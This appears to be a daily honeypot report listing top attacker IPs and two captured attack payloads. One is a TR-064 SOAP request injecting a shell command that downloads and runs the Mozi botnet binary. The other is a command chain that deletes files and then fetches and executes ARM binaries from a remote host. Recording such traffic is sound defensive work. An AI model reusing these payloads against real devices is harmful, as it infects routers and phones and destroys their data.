Top 5 IPs for 04-10-2024 :

115.75.18.93
188.171.35.7
176.99.176.164
45.164.177.105
185.82.72.152


Malware Observed:

None 


Commands/exploits observed :


POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:5555
User-Agent: Hello, world
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 640

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://14.120.78.104:49976/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


cd /data/local/tmp/; rm *; busybox wget http://pen.gorillafirewall.su/arm.nn; chmod +x arm.nn; ./arm.nn arm.android; busybox wget http://pen.gorillafirewall.su/arm5.nn; chmod +x arm5.nn; ./arm5.nn arm5.android; busybox wget http://pen.gorillafirewall.su/arm6.nn; chmod +x arm6.nn; ./arm6.nn arm6.android; busybox wget http://pen.gorillafirewall.su/arm7.nn; chmod +x arm7.nn; ./arm7.nn arm7.android
